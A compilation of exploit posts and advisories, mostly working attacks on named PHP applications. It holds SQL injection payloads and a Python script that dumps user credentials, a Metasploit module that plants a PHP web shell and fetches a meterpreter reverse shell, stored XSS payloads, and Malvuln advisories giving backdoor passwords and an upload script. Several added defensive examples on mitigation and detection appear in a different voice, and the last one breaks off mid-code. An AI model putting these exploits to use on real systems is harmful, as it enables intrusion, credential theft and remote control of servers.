<pre><code># Exploit Title: Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection<br /># Date: 26 December 2023<br /># Exploit Author: Gnanaraj Mauviel (@0xm3m)<br /># Vendor: oretnom23<br /># Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip<br /># Version: v1.0<br /># Tested on: Mac OSX, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Source Code(/php-attendance/classes/actions.class.php):<br /><br />public function attendanceStudents($class_id = "", $class_date = ""){<br />if(empty($class_id) || empty($class_date))<br />return [];<br />$sql = "SELECT `students_tbl`.*, COALESCE((SELECT `status` FROM `attendance_tbl` where `student_id` = `students_tbl`.id and `class_date` = '{$class_date}' ), 0) as `status` FROM `students_tbl` where `class_id` = '{$class_id}' order by `name` ASC";<br />$qry = $this->conn->query($sql);<br />$result = $qry->fetch_all(MYSQLI_ASSOC);<br />return $result;<br />}<br /><br />-> sqlmap -u "http://localhost/php-attendance/?page=attendance&class_id=446&class_date=0002-02-20" --batch<br />---<br />Parameter: class_id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=attendance&class_id=446' AND (SELECT 5283 FROM (SELECT(SLEEP(5)))zsWT) AND 'nqTi'='nqTi&class_date=0002-02-20<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 6 columns<br /> Payload: page=attendance&class_id=446' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x7154766a5453645a7a4d497071786a6f4b647a5a6d4162756c72636b4a4555746d555a5a71614d4c,0x71767a7a71),NULL-- -&class_date=0002-02-20<br />---<br /><br /><br /><br /><br 
/>---------------<br /><br /># Exploit Title: Simple Student Attendance System - Time Based Blind SQL Injection<br /># Date: 26 December 2023<br /># Exploit Author: Gnanaraj Mauviel (@0xm3m)<br /># Vendor: oretnom23<br /># Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip<br /># Version: v1.0<br /># Tested on: Mac OSX, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Source Code(/php-attendance/classes/actions.class.php):<br /><br />public function delete_student(){<br />extract($_POST);<br />$delete = $this->conn->query("DELETE FROM `students_tbl` where `id` = '{$id}'");<br />if($delete){<br />$_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Student has been deleted successfully!" ];<br />return [ "status" => "success" ];<br />}else{<br />$_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Student has failed to deleted due to unknown reason!" ];<br />return [ "status" => "error", "Student has failed to deleted!" ];<br />}<br />}<br /><br />-> sqlmap -u "http://localhost/php-attendance/ajax-api.php?action=delete_student" --data="id=7" --technique=T --batch<br />---<br />Parameter: id (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=7' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))kVAW) AND 'vAFW'='vAFW<br />---<br /></code></pre>
<pre><code># Exploit Title: Enrollment System v1.0 - SQL Injection<br /># Date: 27 December 2023<br /># Exploit Author: Gnanaraj Mauviel (@0xm3m)<br /># Vendor: Obi08<br /># Vendor Homepage: https://github.com/Obi08/Enrollment_System<br /># Software Link: https://github.com/Obi08/Enrollment_System<br /># Version: v1.0<br /># Tested on: Mac OSX, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />from bs4 import BeautifulSoup<br />import requests<br />import urllib3<br /><br />#The Config class defines three class attributes: BASE_URL, URI, and PAYLOAD.<br /><br />#BASE_URL is set to the string "http://localhost/enrollment_system".<br />#URI is set to the string "/get_subject.php".<br />#PAYLOAD is set to the string "emc' union select 1,concat(user_type,'::',username,'::',password),3,4,5,6 from users-- -".<br /><br />class Config:<br />    BASE_URL = "http://localhost/enrollment_system"<br />    URI = '/get_subject.php'<br />    PAYLOAD = "emc' union select 1,concat(user_type,'::',username,'::',password),3,4,5,6 from users-- -"<br /><br />urllib3.disable_warnings()<br />proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}<br /><br />#This code defines a function called exploit_sqli that exploits a SQL injection vulnerability in a given URL. It takes in a requests.Session object and a Config object as parameters. The function constructs a URL using the BASE_URL and URI properties from the Config object, and creates a dictionary of parameters with a key of 'keyword' and a value of the PAYLOAD property from the Config object.<br />#The function then tries to make a request using the make_request function and returns the response text if successful. If an exception is raised during the request, it prints an error message and returns an empty string.<br /><br />def exploit_sqli(session: requests.Session, config: Config) -> str:<br />    """<br />    Exploits SQL injection vulnerability in the given URL.<br /><br />    Args:<br />        session (requests.Session): The session object to use for making the request.<br />        config (Config): Configuration object containing base URL, URI, and payload.<br /><br />    Returns:<br />        str: The response text from the request.<br />    """<br />    url = f"{config.BASE_URL}{config.URI}"<br />    params = {'keyword': config.PAYLOAD}<br /><br />    try:<br />        response = make_request(session, url, params)<br />        return response.text<br />    except requests.RequestException as e:<br />        print(f"Request failed: {e}")<br />        return ""<br /><br />#This code defines a function called make_request that takes in a requests.Session object, a URL string, and a dictionary of parameters. It makes a POST request using the provided session and parameters, and returns the response object. The function has type hints indicating the types of the arguments and the return value.<br /><br />def make_request(session: requests.Session, url: str, params: dict) -> requests.Response:<br />    """<br />    Make a POST request with error handling.<br /><br />    Args:<br />        session (requests.Session): The session object to use for making the request.<br />        url (str): The URL to send the request to.<br />        params (dict): The parameters to include in the request.<br /><br />    Returns:<br />        requests.Response: The response object.<br />    """<br />    return session.post(url, data=params, verify=False, proxies=proxies)<br /><br />#This code snippet defines a function called parse_html that takes a string parameter response_text. It uses the BeautifulSoup library to parse the HTML in response_text and extract specific data from it. It finds all <tr> elements in the HTML, skips the header row, and then iterates over the remaining rows. For each row, it finds all <td> elements and extracts the text content from the second and third column. Finally, it prints a formatted string that includes the extracted data.<br /><br />def parse_html(response_text: str):<br />    soup = BeautifulSoup(response_text, 'html.parser')<br />    rows = soup.find_all('tr')[1:]  # Skip the header row<br /><br />    for row in rows:<br />        columns = row.find_all('td')<br />        if columns:<br />            subject_code = columns[1].text.strip()<br />            subject_description = columns[2].text.strip()<br />            print(f"User_Type::Username::Password == {subject_code}")<br /><br />if __name__ == "__main__":<br />    # file deepcode ignore MissingClose: <please specify a reason of ignoring this><br />    session = requests.Session()<br />    response = exploit_sqli(session, Config)<br /><br />    if response:<br />        parse_html(response)<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />#<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> prepend Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'BoidCMS Command Injection',<br /> 'Description' => %q{<br /> This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0<br /> and below. BoidCMS allows the authenticated upload of a php file as media if the file has<br /> the GIF header, even if the file is a php file.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> '1337kid', # Discovery<br /> 'bwatters-r7' # Metasploit Module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2023-38836' ],<br /> [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']<br /> ],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [<br /> 'nix Command',<br /> {<br /> 'Platform' => ['linux', 'unix', 'python'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_COMMAND' => 'WGET',<br /> 'FETCH_WRITABLE_DIR' => '/tmp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => ['windows', 'python'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_WRITABLE_DIR' => '%TEMP%',<br /> 'FETCH_COMMAND' => 'CURL'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-07-13',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> 
OptString.new('TARGETURI', [true, 'The path', '']),<br /> OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),<br /> OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),<br /> OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])<br /><br /> ])<br /> @token = nil<br /> @shell_filename = nil<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'admin'),<br /> 'keep_cookies' => true,<br /> 'method' => 'GET'<br /> )<br /> if res && res.code == 200<br /> title = res.get_html_document.xpath('//title').first.to_s<br /> return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')<br /> end<br /> return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')<br /> end<br /><br /> def extract_token(res)<br /> token = nil<br /> if res && res.code == 200<br /> token = res.get_html_document.xpath("//input[@name='token']/@value").first<br /> end<br /> token<br /> end<br /><br /> def cms_token<br /> # initial login<br /> return @token unless @token.nil?<br /><br /> vprint_status('Getting Token')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'admin'),<br /> 'keep_cookies' => true,<br /> 'method' => 'GET'<br /> )<br /> @token = extract_token(res)<br /> end<br /><br /> def cms_login?(login_token)<br /> vprint_status('Logging into CMS')<br /> cms_password = datastore['CMS_PASSWORD']<br /> cms_username = datastore['CMS_USERNAME']<br /> vars_form_data =<br /> [<br /> {<br /> 'name' => 'username',<br /> 'data' => cms_username<br /> },<br /> {<br /> 'name' => 'password',<br /> 'data' => cms_password<br /> },<br /> {<br /> 'name' => 'login',<br /> 'data' => 'Login'<br /> },<br /> {<br /> 'name' => 'token',<br /> 'data' => login_token.to_s<br /> }<br /> ]<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'admin'),<br /> 'method' 
=> 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_form_data' => vars_form_data<br /> )<br /> res && res.code == 302<br /> end<br /><br /> def upload_php?(login_token, shell_filename)<br /> vprint_status("Uploading PHP file #{shell_filename}")<br /> vars_form_data =<br /> [<br /> {<br /> 'name' => 'file',<br /> 'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',<br /> 'filename' => shell_filename<br /> },<br /> {<br /> 'name' => 'token',<br /> 'data' => login_token.to_s<br /> },<br /> {<br /> 'name' => 'upload',<br /> 'data' => 'Upload'<br /> }<br /> ]<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'admin'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_get' => {<br /> 'page' => 'media'<br /> },<br /> 'vars_form_data' => vars_form_data<br /> )<br /> res && res.code == 302<br /> end<br /><br /> def launch_payload(shell_filename, payload_cmd)<br /> # send the command to the php page<br /> vprint_status('launching Payload')<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 'vars_get' =><br /> {<br /> 'cmd' => payload_cmd<br /> }<br /> )<br /> end<br /><br /> def exploit<br /> @shell_filename = datastore['PHP_FILENAME']<br /> login_token = cms_token<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?<br /> fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)<br /> if upload_php?(login_token, @shell_filename)<br /> register_file_for_cleanup @shell_filename<br /> launch_payload(@shell_filename, payload.encoded)<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Failed to upload php files')<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code>- Title: Membership Management System - SQL injection<br />- Application: Hospital Management System<br />- Date: 01.03.2024<br />- Bugs: SQL injection<br />- Exploit Author: SoSPiro<br />- Vendor Homepage: https://codeastro.com/author/nbadmin/<br />- Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/<br />- Version: 1.0<br />- Tested on: Windows 10 64 bit Wampserver<br /><br />### Vulnerability Description:<br /><br />The provided payload in the POST request indicates a potential SQL injection vulnerability. Specifically, the manipulation within the email and password parameters suggests an attempt to influence the SQL query directly, presenting a risk for exploiting security vulnerabilities.<br /><br />### SQL Injection:<br /><br />This manipulated submission aims to affect the SQL query by incorporating user input. For instance, the use of **sleep(5)** introduces a time-delay technique, indicative of a potential resource-consuming attack vector by malevolent actors.<br /><br />### Proof of Concept (PoC):<br /><br />Below is an example payload illustrating the SQL injection vulnerability:<br /><br />```<br />email=test@123.asd' + (SELECT * FROM (SELECT (SLEEP(5)))a) +'&password=admin' or '1'='1'&login=<br />```<br /><br />In this example, the **sleep(5)** function is employed to induce a time delay, followed by the use of **or '1'='1'** in the password control section, aiming to always evaluate as true.<br /><br />- Request Response<br /><br />[PoC FoTo](https://gcdnb.pbrd.co/images/9k8xy4YRomp3.png?o=1)<br /><br />### Vulnerable Code Section:<br /><br />```php<br />$email = $_POST['email'];<br />$password = $_POST['password'];<br /><br />$hashed_password = md5($password);<br />$sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";<br />```<br /><br />The provided PHP code section exacerbates the SQL injection risk by directly incorporating user input into the SQL query. To mitigate this vulnerability, the use of parameterized queries or prepared statements is recommended.<br /><br />## Reproduce: https://sospiro014.github.io/Membership-Management-System-SQL-injection<br /><br /></code></pre>
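The mitigation the advisory recommends, parameterized queries, shown side by side with the vulnerable pattern. This is an added example and not the project's code: the same login check is written twice in Python, with an in-memory SQLite database standing in for MySQL. `login_vulnerable` interpolates input into the SQL text exactly as the PHP above does; `login_fixed` binds it as a parameter. The user record and the probe string `' OR '1'='1' -- ` are constructed for the demonstration (the PoC payload above uses the same `'1'='1'` tautology). One thing the code makes visible: because `md5()` runs before the concatenation, the password parameter reaches the query only as 32 hex characters, so the email parameter is the one that carries the injection.

```python
"""Login check: string-built SQL beside a parameterized query (added example;
mirrors the advisory's PHP logic in Python with SQLite standing in for MySQL)."""
import hashlib
import sqlite3

# Constructed probe in the shape of the advisory's tautology; the trailing
# "-- " comments out the rest of the WHERE clause in the string-built query.
PROBE = "' OR '1'='1' -- "


def setup_db() -> sqlite3.Connection:
    """Constructed sample user table with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users (email, password) VALUES (?, ?)",
        ("alice@example.com", hashlib.md5(b"correct-horse").hexdigest()),
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """Same shape as the PHP above: the hash shields the password field only
    because md5() output is 32 hex characters; email goes into the SQL text raw."""
    hashed = hashlib.md5(password.encode()).hexdigest()
    sql = f"SELECT * FROM users WHERE email = '{email}' AND password = '{hashed}'"
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """Parameterized query: the driver passes email as a value, so quotes and
    comment markers inside it can never change the statement."""
    hashed = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT 1 FROM users WHERE email = ? AND password = ?", (email, hashed)
    ).fetchone()
    return row is not None


def compare(conn: sqlite3.Connection) -> dict:
    """Run both implementations against a valid login and against the probe."""
    return {
        "valid/vulnerable": login_vulnerable(conn, "alice@example.com", "correct-horse"),
        "valid/fixed": login_fixed(conn, "alice@example.com", "correct-horse"),
        "probe/vulnerable": login_vulnerable(conn, PROBE, "wrong"),
        "probe/fixed": login_fixed(conn, PROBE, "wrong"),
    }


if __name__ == "__main__":
    for case, ok in compare(setup_db()).items():
        print(f"{case:18} -> {'logged in' if ok else 'rejected'}")
```

The probe logs in through `login_vulnerable` with a wrong password and is rejected by `login_fixed`; both accept the genuine credentials. MD5 is kept here only to mirror the advisory's code, it is not a suitable password hash.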
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/2a442d3da88f721a786ff33179c664b7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.amt<br />Vulnerability: Authentication Bypass<br />Description: The malware can run an FTP server which listens on TCP port 2121. Third-party attackers who can reach infected systems can log on using any username/password combination. Intruders can then upload executables using the FTP PASV and STOR commands, which can result in remote code execution.<br />Family: Agent<br />Type: PE32<br />MD5: 2a442d3da88f721a786ff33179c664b7<br />Vuln ID: MVID-2024-0673<br />Disclosure: 02/28/2024<br /><br /><br />Exploit/PoC:<br />C:\sec>nc64.exe 192.168.18.125 2121<br />220 Welcome To mybr Ftp!<br />USER gg<br />331 Password required for gg.<br />PASS gg<br />230 User gg logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP<br />250 CWD command successful. "C:/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,211,164).<br />STOR DOOM_SM.exe<br />150 Opening data connection for DOOM_SM.exe.<br />226 File received ok<br /><br />from socket import *<br />import time<br /><br />HOST = "192.168.18.125"<br />PORT = 54180<br />BUF_SIZE = 32<br />s = socket(AF_INET, SOCK_STREAM)<br />s.connect((HOST, PORT))<br /><br />with open("DOOM_SM.exe", "rb") as f:<br />    while True:<br />        bytez = f.read(BUF_SIZE)<br />        if not bytez:<br />            break<br />        s.send(bytez)<br />        time.sleep(0.5)<br /><br />print("By malvuln")<br />s.close()<br /><br />1/23/2024 9:13:03 PM - gg - 0.0.0.0 Disconnected<br />1/23/2024 9:10:36 PM - gg - 0.0.0.0 STOR C:\DOOM_SM.exe<br />1/23/2024 9:09:54 PM - gg - PASV C:\<br />1/23/2024 9:09:44 PM - CD C:\<br />1/23/2024 9:09:44 PM - gg - CDUP C:\<br />1/23/2024 9:09:18 PM - gg - SYST C:\<br />1/23/2024 9:09:15 PM - gg<br />1/23/2024 9:09:15 PM - gg - PASS C:\TEMP\hate<br />1/23/2024 9:09:12 PM - - USER C:\TEMP\gg<br />1/23/2024 9:09:06 PM - - Connected<br />1/23/2024 9:08:58 PM - FTP Started<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
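For a responder who finds the backdoor's own server log (the block of timestamped lines above) on an infected host, the parser below turns those lines into a chronological session timeline and flags every upload of an executable, together with the account that authenticated. This is an added example and not part of the advisory. The line format, `M/D/YYYY h:mm:ss AM|PM - <user> - [<ip>] <COMMAND> [<argument>]` with the user field sometimes empty and a few lines carrying no command, is inferred from the lines above; the sample lines in `SAMPLE_LOG` are constructed to mirror them.

```python
"""Triage of the FTP server log left by the backdoor (added example, not part of
the advisory). The line format is inferred from the log lines in the advisory:
  M/D/YYYY h:mm:ss AM|PM - <user> - [<ip>] <COMMAND> [<argument>]
with the user field sometimes empty and a few lines carrying no command."""
import re
from datetime import datetime
from typing import Dict, List, Optional, Tuple

LINE_RE = re.compile(
    r"^(?P<ts>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M) - (?P<rest>.*)$"
)
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}\s+")
EXEC_EXT_RE = re.compile(r"\.(exe|dll|scr|com|bat|cmd|ps1|vbs|js)$", re.IGNORECASE)

# Constructed sample mirroring the advisory's log (newest line first, as logged).
SAMPLE_LOG = [
    "1/23/2024 9:13:03 PM - gg - 0.0.0.0 Disconnected",
    "1/23/2024 9:10:36 PM - gg - 0.0.0.0 STOR C:\\DOOM_SM.exe",
    "1/23/2024 9:09:54 PM - gg - PASV C:\\",
    "1/23/2024 9:09:44 PM - CD C:\\",
    "1/23/2024 9:09:44 PM - gg - CDUP C:\\",
    "1/23/2024 9:09:18 PM - gg - SYST C:\\",
    "1/23/2024 9:09:15 PM - gg",
    "1/23/2024 9:09:15 PM - gg - PASS C:\\TEMP\\hate",
    "1/23/2024 9:09:12 PM - - USER C:\\TEMP\\gg",
    "1/23/2024 9:09:06 PM - - Connected",
    "1/23/2024 9:08:58 PM - FTP Started",
]


def parse_event(line: str) -> Optional[Dict[str, object]]:
    """Split one log line into timestamp, user, command and argument."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%m/%d/%Y %I:%M:%S %p")
    rest = m.group("rest")
    if rest.startswith("- "):          # "- USER ...": empty user field
        user, tail = "", rest[2:]
    elif " - " in rest:                # "gg - PASV C:\"
        user, tail = rest.split(" - ", 1)
    else:                              # "FTP Started", "CD C:\", or a bare "gg"
        user, tail = "", rest
    tail = IPV4_RE.sub("", tail)       # drop the "0.0.0.0 " prefix some lines carry
    cmd, _, arg = tail.partition(" ")
    return {"ts": ts, "user": user, "cmd": cmd.upper(), "arg": arg}


def triage(lines: List[str]) -> Tuple[List[Dict[str, object]], List[Dict[str, str]]]:
    """Return (chronological events, findings).

    A finding is raised for every STOR whose target has an executable
    extension, tagged with the user recorded on that line.
    """
    events = sorted((e for e in map(parse_event, lines) if e), key=lambda e: e["ts"])
    findings: List[Dict[str, str]] = []
    for e in events:
        if e["cmd"] == "STOR" and EXEC_EXT_RE.search(str(e["arg"])):
            findings.append({
                "when": e["ts"].strftime("%Y-%m-%d %H:%M:%S"),
                "user": str(e["user"]) or "?",
                "path": str(e["arg"]),
            })
    return events, findings


if __name__ == "__main__":
    events, findings = triage(SAMPLE_LOG)
    for e in events:
        print(f"{e['ts']:%H:%M:%S} {str(e['user']) or '-':4} {e['cmd']:12} {e['arg']}")
    for f in findings:
        print(f"FINDING: {f['when']} user {f['user']} stored executable {f['path']}")
```

Sorting by timestamp restores the order of the session (the log is written newest first), which is what a timeline in an incident report needs; the STOR finding is the pivot for locating the dropped file on disk.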
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/d6b192a4027c7d635499133ca6ce067f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Jeemp.c<br />Vulnerability: Cleartext Hardcoded Credentials<br />Description: The malware listens on three TCP ports which are randomized, e.g. 9719, 7562, 8687, 8948, 7376, 8396 and so forth. There is an ESMTP server component "jeem.mail.pv" requiring authentication for the GDATA and SDATA commands, and the sample is packed using UPX. However, it is trivial to unpack using the -d flag, which reveals the cleartext hardcoded credentials "jeepower" and "jeespower" in the PE file.<br />Family: Jeemp<br />Type: PE32<br />MD5: d6b192a4027c7d635499133ca6ce067f<br />Vuln ID: MVID-2024-0672<br />Dropped files: msrexe.exe<br />Disclosure: 02/28/2024<br /><br />Exploit/PoC:<br />TELNET x.x.x.x 7562<br />220 jeem.mail.pv ESMTP<br />HELO hate<br />250 ok<br />GDATA<br />250 ok<br />Need password<br />jeepower<br />[prx]#######<br />250 ok<br /><br />SDATA<br />250 ok<br />Need password<br />abc123!<br />503 wrong!<br />SDATA<br />250 ok<br />Need password<br />jeespower<br />250 ok<br /><br /></code></pre>
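A network-side check for the behaviour in the transcript above, as an added example that is not from the advisory: given a captured SMTP dialogue (here as constructed `C:`/`S:` lines modeled on the transcript, with the password replaced by a placeholder), it flags a banner matching the backdoor's `jeem.mail.pv ESMTP`, server lines that are not RFC 5321 reply lines (`Need password` has no three-digit code), and non-standard verbs such as `GDATA` that the server accepts with a 2xx reply. The transcript format, the function name and the constructed benign dialogue are assumptions of the example.

```python
"""Anomaly check for a captured SMTP dialogue (added example, not from the advisory).
Input lines are constructed as "C: ..." / "S: ..." pairs; this format and the
function names are assumptions of the example."""
import re
from typing import List, Tuple

# RFC 5321 commands plus the common extensions a legitimate server would accept.
STANDARD_VERBS = {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "VRFY", "EXPN",
                  "HELP", "NOOP", "QUIT", "STARTTLS", "AUTH", "BDAT"}
# Banner fragment taken from the advisory's transcript.
KNOWN_BACKDOOR_BANNERS = {"jeem.mail.pv ESMTP": "Backdoor.Win32.Jeemp.c (MVID-2024-0672)"}
# Every SMTP reply line starts with a three-digit code followed by space, '-' or end of line.
REPLY_RE = re.compile(r"^(\d{3})(?:[ -]|$)")

# Constructed dialogue modeled on the advisory's transcript (password redacted).
SUSPICIOUS_TRANSCRIPT = [
    "S: 220 jeem.mail.pv ESMTP",
    "C: HELO analyst",
    "S: 250 ok",
    "C: GDATA",
    "S: 250 ok",
    "S: Need password",
    "C: <password>",
    "S: 250 ok",
    "C: QUIT",
    "S: 221 bye",
]
# Constructed ordinary dialogue with a multi-line EHLO reply.
BENIGN_TRANSCRIPT = [
    "S: 220 mail.example.com ESMTP Postfix",
    "C: EHLO client.example.com",
    "S: 250-mail.example.com",
    "S: 250 OK",
    "C: MAIL FROM:<a@example.com>",
    "S: 250 2.1.0 Ok",
    "C: QUIT",
    "S: 221 2.0.0 Bye",
]


def analyze_transcript(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (finding-kind, detail) tuples in the order they occur."""
    findings: List[Tuple[str, str]] = []
    pending_verb = None      # last client command awaiting its reply
    in_body = False          # inside a DATA body, which ends with a lone "."
    prompt_seen = False      # server sent free text; the next client line is input, not a verb
    for line in lines:
        side, _, text = line.partition(": ")
        if side == "C":
            if in_body:
                in_body = text != "."
                continue
            if prompt_seen:
                prompt_seen = False
                pending_verb = None
                continue
            pending_verb = text.split(" ", 1)[0].upper()
        elif side == "S":
            m = REPLY_RE.match(text)
            if not m:
                findings.append(("non-rfc-reply", text))
                prompt_seen = True
                continue
            code = m.group(1)
            if code == "220":
                for banner, label in KNOWN_BACKDOOR_BANNERS.items():
                    if banner in text:
                        findings.append(("known-backdoor-banner", label))
            elif code == "354":
                in_body = True
            elif code.startswith("2") and pending_verb and pending_verb not in STANDARD_VERBS:
                findings.append(("nonstandard-verb-accepted", pending_verb))
            pending_verb = None
    return findings


if __name__ == "__main__":
    for kind, detail in analyze_transcript(SUSPICIOUS_TRANSCRIPT):
        print(f"{kind:28} {detail}")
    print("benign findings:", analyze_transcript(BENIGN_TRANSCRIPT))
```

The banner match is the weakest signal (a string the malware author can change); the protocol-shape checks hold as long as the component keeps answering `250 ok` to verbs no mail server defines.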
<pre><code># Exploit Title: IDonate – blood request management system <=1.8.1 - Stored Cross-Site Scripting (Authenticated)<br /># Date: 29-02-2024<br /># Exploit Author: Laburity Research Team<br /># Vendor Homepage: https://wordpress.org/plugins/idonate/<br /># Version: <=1.8.1<br /># Tested on: Firefox<br /># Contact me: contact [at] laburity.com<br /><br /># Summary:<br /><br />A stored cross-site scripting vulnerability has been identified in the WordPress plugin IDonate – blood request management system, version less than 1.8.1, that allows authenticated users to run arbitrary JavaScript code inside WordPress using the blood request management system plugin.<br /><br /># POC<br /><br />1- Navigate to http://localhost:10003/wp-admin/admin.php?page=idonate-setting-admin<br />2- Enter payload "><h1 onclick=alert(1)>XSS</h1> in Recaptcha secret key and in Recaptcha Site key<br />3- Click on save changes.<br />4- While clicking on the payload text, XSS will trigger.<br /><br /># Vulnerable Code:<br /><br />```<br />public function idonate_recaptcha_secretkey_callback()<br />{<br />    if( isset( $this->general_options['idonate_recaptcha_secretkey'] ) ){<br />        $secretkey = $this->general_options['idonate_recaptcha_secretkey'];<br />    }else{<br />        $secretkey = '';<br />    }<br /><br />    //<br />    printf(<br />        '<input type="text" id="idonate_recaptcha_secretkey" value="%s" name="idonate_general_option_name[idonate_recaptcha_secretkey]" />',<br />        $secretkey<br />    );<br />}<br />```<br /><br />Secret keys (idonate_recaptcha_secretkey) are printed without sanitization.<br /></code></pre>
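The fix is to escape the stored value for an HTML attribute context before printing it, which in WordPress is `esc_attr()`. This added example (not the plugin's code) reproduces the plugin's `printf` output in Python, shows how the payload above breaks out of the `value` attribute when the raw string is used, and shows the escaped rendering keeping it inert, with `html.escape` standing in for `esc_attr()`. The small `HTMLParser` subclass used to inspect both outputs is part of the example.

```python
"""Attribute-context escaping for the setting echoed by the plugin (added example;
not the plugin's code). html.escape stands in for WordPress esc_attr()."""
import html
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# The payload from the PoC above.
PAYLOAD = '"><h1 onclick=alert(1)>XSS</h1>'

# Same markup the plugin prints; {value} is where %s sits in its printf.
TEMPLATE = ('<input type="text" id="idonate_recaptcha_secretkey" value="{value}" '
            'name="idonate_general_option_name[idonate_recaptcha_secretkey]" />')


def render_unsafe(secretkey: str) -> str:
    """What the plugin does: the stored value lands in the attribute verbatim."""
    return TEMPLATE.format(value=secretkey)


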